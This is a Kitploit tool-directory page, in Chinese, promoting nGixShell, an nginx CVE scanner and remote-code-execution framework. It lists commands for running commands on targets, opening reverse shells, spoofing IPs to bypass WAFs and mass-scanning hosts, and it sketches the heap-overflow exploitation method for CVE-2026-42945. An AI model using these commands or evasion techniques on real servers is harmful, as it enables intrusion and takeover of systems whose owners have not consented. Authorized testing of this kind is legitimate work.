Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
nGixshell — nginx CVE 扫描器 + RCE 漏洞利用框架 (CVE-2026-42945 及另外 16 个) | Kitploit
工具/GitHubGitHub/mateusverass/ngixshell
侦察漏洞扫描器漏洞利用框架Web应用程序漏洞利用WAF绕过Web安全渗透测试命令与控制子域名枚举红队Payload 开发
GitHub
21863个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
mateusverass/ngixshell

nGixshell

nginx CVE 扫描器 + RCE 漏洞利用框架 (CVE-2026-42945 及另外 16 个)

查看仓库
nGixShell

Python CVEs Zero deps License


nGixShell 是一个 nginx CVE 扫描器和 RCE 漏洞利用框架。它附带一个针对 CVE-2026-42945 的可工作概念验证(proof-of-concept)——ngx_http_rewrite_module 中的一个严重堆缓冲区溢出——以及一个覆盖 53 个 nginx CVE 的扫描器,具备自动化 HTTP 探测、指纹识别、WAF 检测/绕过、Web 安全审计和报告生成功能。

零外部依赖。纯 Python 3 标准库。


快速开始

root@kitploit:~
# Spin up the vulnerable lab
docker compose -f env/docker-compose.yml up -d

# Auto mode — fingerprint + CVE scan + web audit
python3 ngixshell.py 127.0.0.1:19321

# Execute a command via RCE (CVE-2026-42945)
python3 ngixshell.py 127.0.0.1:19321 --cmd 'id'

# Drop a reverse shell (IP auto-detected)
python3 ngixshell.py 127.0.0.1:19321 --shell --shell-type bash --upgrade-shell

# Detect and bypass WAF, then scan
python3 ngixshell.py 127.0.0.1:19321 --waf-bypass

# Subdomain scan
python3 ngixshell.py --subdomain-scan example.com --scan-port 443

# Multiple targets from a file
python3 ngixshell.py --target-file hosts.txt --json --html-report results.html

无需任何参数——将工具指向目标即可自动运行所有操作。
TLS 为自动检测。即使 server_tokens off,nginx 也能被指纹识别。


使用

root@kitploit:~
python3 ngixshell.py [TARGET] [OPTIONS]

TARGET formats:
  127.0.0.1
  192.168.1.10:8080
  http://192.168.1.10:8080
  https://target.local

模式

WAF 检测与绕过

FlagDescription
--waf-detect扫描前检测 WAF
--waf-bypass启用所有绕过技术(同时运行检测)
--waf-ip IP在绕过头中伪造此 IP(默认:随机 RFC1918)

绕过技术(在设置 --waf-bypass 时全部激活):

可检测的 WAF: Cloudflare、AWS WAF、Akamai、Imperva/Incapsula、ModSecurity、F5 BIG-IP ASM、Sucuri、Barracuda、NAXSI、Fastly、Wordfence

Web 审计

扫描模式下自动运行。所有模块均可单独跳过。

  • 响应头审计 — HSTS、CSP、X-Frame-Options、X-Content-Type-Options、Referrer-Policy、Permissions-Policy、泄露版本的响应头
  • 路径发现 — 50+ 路径;哨兵探测消除 catch-all 403/301 规则导致的误报
  • 虚拟主机枚举 — 需要状态码和响应体双重差异,避免默认拦截块误报
  • TLS 审计 — 测试 TLS 1.0–1.3 支持、证书过期和自签名检测
  • stub_status — 如果暴露了 /nginx_status,则解析活动连接指标

连接

FlagDescription
--port PORT覆盖端口
--tls强制启用 TLS(默认自动检测)

HTTP

FlagDescription
--user-agent UA自定义 User-Agent
--auth USER:PASSHTTP Basic 认证
--cookie VALUE

速率 / 时间

FlagDescription
--rate-limit RPS最大每秒请求数
--jitter MS请求间随机延迟 0–MS 毫秒
--retry N重试不确定的探测(默认:1)

输出

FlagDescription
--output FILE将日志写入 FILE

CVE 覆盖

涵盖 2009–2026 年间的 53 个 CVE。按 CVSS 排序。


漏洞分析(CVE-2026-42945)

nginx 的 rewrite 脚本引擎采用**两遍(two-pass)**模型:先计算缓冲区大小,再复制。当 rewrite 替换内容包含 ? 时,主引擎会设置 is_args 标志,但长度计算遍运行在一个全新归零的子引擎上:

  • 长度遍 — 看到 is_args = 0 → 返回原始捕获长度
  • 复制遍 — 看到 is_args = 1 → 调用 ngx_escape_uri(NGX_ESCAPE_ARGS),将每个不安全字节扩展为 3 字节

复制操作会用攻击者控制的 URI 数据溢出过小的堆缓冲区。利用过程通过跨请求堆风水(heap feng shui)破坏相邻的 ngx_pool_t 清理指针,将其重定向到一个伪造的 ngx_pool_cleanup_s,从而在池销毁时调用 system()。

受影响版本

ProductVulnerableFixed
NGINX Open Source0.6.27 – 1.30.01.31.0, 1.30.1
NGINX PlusR32 – R36R36 P4, R35 P2, R32 P6

厂商公告:https://my.f5.com/manage/s/article/K000160932


实验室搭建

已在 Ubuntu 24.04 LTS 上测试。需要 Docker 和 Python 3.8+。

root@kitploit:~
# Start the vulnerable lab (nginx 1.25.3)
docker compose -f env/docker-compose.yml up -d

# Full scan
python3 ngixshell.py 127.0.0.1:19321

# RCE with JSON output
python3 ngixshell.py 127.0.0.1:19321 --cmd 'id' --json

# Reverse shell — bash payload, PTY auto-upgrade
python3 ngixshell.py 127.0.0.1:19321 --shell --shell-type bash --upgrade-shell

# WAF bypass scan with spoofed IP
python3 ngixshell.py 127.0.0.1:19321 --waf-bypass --waf-ip 10.10.10.1

# Through SOCKS5 proxy
python3 ngixshell.py 192.168.1.10 --proxy socks5://127.0.0.1:9050

# Subdomain scan with rate limiting
python3 ngixshell.py --subdomain-scan example.com --scan-port 443 --rate-limit 10

# Multiple targets, JSON output, HTML report
python3 ngixshell.py --target-file hosts.txt --json --html-report results.html

免责声明

仅用于授权的安全测试、CTF 竞赛和研究。

下载工具
FlagDescription
(none)自动 — 指纹识别 + CVE 扫描 + Web 审计
--cmd 'CMD'通过 CVE-2026-42945 RCE 执行命令
--cmd-file FILE从文件执行命令(以 ; 连接)
--shell建立反向 shell
--shell-type TYPEPayload: bash python perl php nc powershell(默认:python)
--upgrade-shellshell 连接后自动发送 PTY 升级
--subdomain-scan DOMAIN在子域名中查找易受攻击的 nginx
--cve CVE-ID测试某个特定 CVE
--list-cves打印全部 53 个 CVE,含 CVSS 和探测信息
--list-candidates打印堆地址候选
--dry-run仅指纹识别 + 扫描,不进行利用
--target-file FILE从文件扫描多个主机
TechniqueDetail
IP 伪造X-Forwarded-For, X-Real-IP, X-Originating-IP, True-Client-IP, X-Remote-IP, X-Client-IP
UA 轮换11 个真实浏览器/爬虫 User-Agent,每次请求随机切换
路径混淆双斜杠、/./ 填充、百分号编码、大小写变化
请求头大小写混排随机化请求头名称的大小写,破坏 WAF 模式匹配
FlagDescription
--skip-headers跳过 HTTP 安全响应头审计
--skip-paths跳过路径/文件发现
--skip-vhosts跳过虚拟主机枚举
--skip-tls跳过 TLS 协议审计
--path-wordlist FILE额外探测的路径(每行一个)
--proxy URL
代理:http://、https://、socks5://
Cookie 头
--header NAME:VALUE额外请求头(可重复)
--timeout-multiplier X缩放所有超时(默认:1.0)
--json结束时打印 JSON 摘要
--html-report [FILE]生成 HTML 报告(默认:ngixshell_<host>_<ts>.html)
--verbose调试输出
CVECVSSComponentDescription
CVE-2026-429459.8 CRITICALrewrite堆溢出 → RCE(已利用)
CVE-2026-429468.1 HIGHrewrite内存损坏(同一公告)
CVE-2022-417417.8 HIGHmp4恶意 mp4 导致的内存损坏
CVE-2016-12477.8 HIGHpackaging日志文件符号链接权限提升
CVE-2021-230177.7 HIGHresolver差一(off-by-one)堆覆写
CVE-2026-407017.5 HIGHrequest请求处理中的内存损坏
CVE-2026-429347.5 HIGHrequest内存损坏(同一公告)
CVE-2026-277847.5 HIGHmp4通过构造的 mp4 导致缓冲区溢出
CVE-2026-326477.5 HIGHmp4缓冲区溢出(上述的姊妹漏洞)
CVE-2024-249907.5 HIGHHTTP/3QUIC 模块中的释放后使用
CVE-2024-249897.5 HIGHHTTP/3QUIC 中的空指针解引用
CVE-2024-310797.5 HIGHHTTP/3QUIC 编码器中的栈溢出
CVE-2024-327607.5 HIGHHTTP/3通过 HEADERS 帧的缓冲区覆写
CVE-2022-417427.5 HIGHmp4堆内存泄露
CVE-2017-75297.5 HIGHrange filter整数溢出 → 越界读取
CVE-2016-07467.5 HIGHresolver通过构造的 DNS 响应导致释放后使用
CVE-2014-01337.5 HIGHSPDYSPDY 实现中的堆溢出
CVE-2014-00887.5 HIGHSPDYSPDY 中的内存损坏
CVE-2013-45477.5 HIGHcore空格+NUL URI 绕过
CVE-2013-20287.5 HIGHcore分块编码栈溢出
CVE-2012-11807.5 HIGHproxy代理模块中的释放后使用
CVE-2009-35557.5 HIGHSSLTLS 重协商注入(MITM)
CVE-2009-26297.5 HIGHcoreURI 解析中的缓冲区下溢
CVE-2026-429266.5 MEDIUMHTTP/2通过代理进行请求拆分
CVE-2026-276546.5 MEDIUMWebDAVDAV 模块中的堆溢出
CVE-2026-287536.5 MEDIUMmail邮件代理中的请求头注入
CVE-2026-16426.5 MEDIUMproxySSL 上游会话复用泄露
CVE-2019-95116.5 MEDIUMHTTP/2Data Dribble CPU/内存 DoS
CVE-2012-20896.8 MEDIUMmp4通过 mp4 请求导致缓冲区溢出
CVE-2018-168455.5 MEDIUMmp4整数下溢 → 崩溃 + 信息泄露
CVE-2019-203725.3 MEDIUMproxyHTTP 请求走私
CVE-2026-404605.3 MEDIUMHTTP/3QUIC 连接伪造
CVE-2026-287555.3 MEDIUMSSLOCSP 处理中的内存泄露
CVE-2025-234195.3 MEDIUMSSLTLS 会话恢复证书绕过
CVE-2024-352005.3 MEDIUMHTTP/3空指针解引用
CVE-2024-341615.3 MEDIUMHTTP/3内存泄露
CVE-2016-44505.3 MEDIUMcore通过分块请求体导致空指针
CVE-2016-07425.0 MEDIUMresolver通过构造的 UDP 数据包导致无效指针
CVE-2016-07475.0 MEDIUMresolverCNAME 解析限制不足
CVE-2014-35565.0 MEDIUMmailSTARTTLS 命令注入
CVE-2013-20705.3 MEDIUMproxy后端响应泄露
CVE-2011-49635.0 MEDIUMaccessIPv6 字面量访问控制绕过
CVE-2011-43155.0 MEDIUMresolver通过构造的 DNS 响应导致堆溢出
CVE-2009-38965.0 MEDIUMcore空指针解引用 DoS
CVE-2025-538594.3 MEDIUMmailSMTP 命令注入
CVE-2014-36164.3 MEDIUMSSLTLS SNI 虚拟主机混淆
CVE-2026-276514.3 MEDIUMmail邮件代理中的空指针解引用
CVE-2019-95134.3 MEDIUMHTTP/2Resource Loop CPU DoS
CVE-2019-95164.3 MEDIUMHTTP/20 长度请求头内存耗尽
CVE-2018-168434.3 MEDIUMHTTP/2过量内存消耗
CVE-2018-168444.3 MEDIUMHTTP/2通过 SETTINGS 帧导致 CPU 过度消耗
CVE-2024-73474.7 MEDIUMmp4越界读取
CVE-2009-38984.9 MEDIUMWebDAV通过 COPY/MOVE 目录遍历